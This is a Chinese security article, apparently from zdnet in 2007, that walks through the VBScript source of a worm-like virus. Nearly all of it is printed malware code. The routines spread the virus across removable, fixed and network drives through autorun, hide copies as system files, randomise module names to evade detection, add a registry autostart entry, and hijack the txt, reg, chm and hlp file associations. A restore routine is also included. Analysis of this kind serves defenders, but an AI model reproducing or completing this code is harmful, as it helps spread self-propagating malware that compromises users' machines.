按照我得到的样本中代码顺序分上中下剖析代码:
病毒主要用到的是Wscript.Shell 对象,所以运行的时候任务管理器里都有Wscript.exe程序的进程的...
作者:论坛整理 来源:zdnet网络安全 2007年12月24日
关键字: 安全 病毒防范 病毒
//调用主程序
Call VirusMain()
//主程序函数
Sub VirusMain()
On Error Resume Next
//执行VBS病毒程序
Call ExeVbs_Virus()
End Sub
//返回病毒管理操作命令
引用
Function ReadOK(objfso, FullPath_OK)
On Error Resume Next
Dim vf, buffer
Set vf = objfso.OpenTextFile(FullPath_OK, 1)
buffer = vf.ReadAll
ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
End Function
//成功感染后写配置文件
引用
Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
On Error Resume Next
Dim vf1
objfso.DeleteFile FullPath_OK, True
Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
//写入OK
vf1.Write "OK" & VBCRLF
//写入日期
vf1.WriteLine Date()
//写入控制命令以及操作结果
vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
Call SetFileAttr(objfso, FullPath_OK)
End Sub
//运行文件函数
引用
Sub Run(ExeFullName)
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ExeFullName
Set WshShell = Nothing
End Sub
//把指定代码拷贝到指定文件函数,参数f(fso对象),code(代码),pathf(文件完整路径)
引用
Sub CopyFile(objfso, code, pathf)
On Error Resume Next
Dim vf
Set vf = objfso.OpenTextFile(pathf, 2, true)
vf.Write code
End Sub
//更换模块名称函数
引用
Function ChangeName(vbsCode, Names)
Dim Name, j, temp, buffer
buffer = vbsCode
Randomize
For Each Name in Names
temp = ""
For j = 1 To Len(Name)
temp = temp & Chr((Int(Rnd * 26) + 65))
Next
buffer = Replace(buffer, Name, temp)
Next
ChangeName = buffer
End Function
//设置文件属性为隐藏系统文件函数,参数f(fso对象),pathf(文件完整路径)
引用
Sub SetFileAttr(objfso, pathf)
Dim vf
Set vf = objfso.GetFile(pathf)
vf.Attributes = 6
End Sub
//遍历所有驱动器函数(1:可移动媒体驱动器 ,2:固定驱动器,3:网络驱动器)
引用
Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T)
On Error Resume Next
Dim d , dc
Set dc = objfso.Drives
For Each d In dc
//感染文件数限制
If Cnt >= CntMax Then ’
Exit For
End If
If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
’If d.DriveType = 1 Then
Call SearchFile(objfso, d.Path & "\", VbsCode_WebPage, VbsCode_Victim, T)
’End If
End If
Next
End Sub
//获取模块代码
引用
Function GetModelCode(vbsCode, N_ModelCode)
On Error Resume Next
Dim n, n1, buffer
buffer = vbsCode
//获取1位数模块
If N_ModelCode>= 1 And N_ModelCode<= 9 Then
//获取模块头部位置
n = InStr(buffer, ModelHead & "1_" & N_ModelCode)
//获取模块尾部位置
n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode)
//获取1位模块代码
GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode))
//获取2位数模块
ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then
n = InStr(buffer, ModelHead & "2_" & N_ModelCode)
n1 = InStr(buffer, ModelTail & "2_" & N_ModelCode)
GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "2_" & N_ModelCode))
//获取3位数模块,因为只有26个模块,所以没用到
ElseIf N_ModelCode>= 100 And N_ModelCode<= 999 Then
n = InStr(buffer, ModelHead & "3_" & N_ModelCode)
n1 = InStr(buffer, ModelTail & "3_" & N_ModelCode)
GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "3_" & N_ModelCode))
End If
End Function
//通过文件名判断文件是否是不健康视频函数,参数fname(文件名),由于怕和谐,我用’??’间隔
引用
Function IsSexFile(fname)
IsSexFile = False
If InStr(fname, "成??人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷??拍")>0 Or _
InStr(fname, "偷??窥")>0 Or InStr(fname, "口??交")>0 Or InStr(fname, "强??奸")>0 Or _
InStr(fname, "轮??奸")>0 Or InStr(fname, "伦??理??片")>0 Or InStr(fname, "自??摸")>0 Then
IsSexFile = True
End If
End Function
//判断文件是否已被感染函数,参数buffer(文件全部数据),ftype(文件类型),返回值:true(已被感染),false(未被感染)
引用
Function Isinfected(buffer, ftype)
Isinfected = True
Select Case ftype
Case "hta", "htm" , "html" , "asp", "vbs"
If InStr(buffer, Head_V) = 0 Then
Isinfected = False
End If
Case Else
Isinfected = True
End Select
End Function
//系统入侵函数
引用
Sub InvadeSystem(objfso, vbsCode)
On Error Resume Next
Dim Value, HCULoad, vbsCode_Virus, dc, d
Value = "%SystemRoot%\System32\WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
vbsCode_Virus = vbsCode
Set dc = objfso.Drives
For Each d In dc
If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
Call AutoRun(objfso, d.DriveLetter, vbsCode_Virus)
End If
Next
//删除低版本的病毒文件与配置文件,拷贝新文件并设置隐藏属性
If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Version Then
objfso.DeleteFile FullPath_V1 , True
Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
Call SetFileAttr(objfso, FullPath_V1)
Else
Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
Call SetFileAttr(objfso, FullPath_V1)
End If
If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)<Version Then
objfso.DeleteFile FullPath_V0 , True
Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
Call SetFileAttr(objfso, FullPath_V0)
Else
Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
Call SetFileAttr(objfso, FullPath_V0)
End If
//添加自启动
If ReadReg(HCULoad)<> FullPath_V1 Then
Call WriteReg (HCULoad, FullPath_V1, "")
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
Call SetTxtFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
Call SetRegFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
Call SetchmFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
Call SethlpFileAss(FullPath_V0)
End If
Call DeSafeSet()
End Sub
//系统恢复函数
引用
Sub RestoreSystem(objfso)
On Error Resume Next
Dim Value, dc, d, HCULoad
Call SafeSet()
//注册表恢复
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
If ReadReg(HCULoad) = FullPath_V1 Then
Call DeleteReg(HCULoad)
End If
Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = "regedit.exe " & """%1"""
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = GetSFolder(1) & "hh.exe " & """%1"""
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = "%SystemRoot%\system32\winhlp32.exe %1"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = """%1"" %*"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Value Then
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\", Value, "REG_SZ")
End If
//清除autorun.inf
Set dc = objfso.Drives
For Each d In dc
If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
End If
Next
If objfso.FileExists(FullPath_V1) = True Then
Set vf = objfso.GetFile(FullPath_V1)
vf.Delete
End If
If objfso.FileExists(FullPath_V0) = true Then
Set vf = objfso.GetFile(FullPath_V0)
vf.Delete
End If
If objfso.FileExists(FullPath_Config) = True Then
objfso.DeleteFile FullPath_Config , True
End If
End Sub
京公网安备 11010802021500号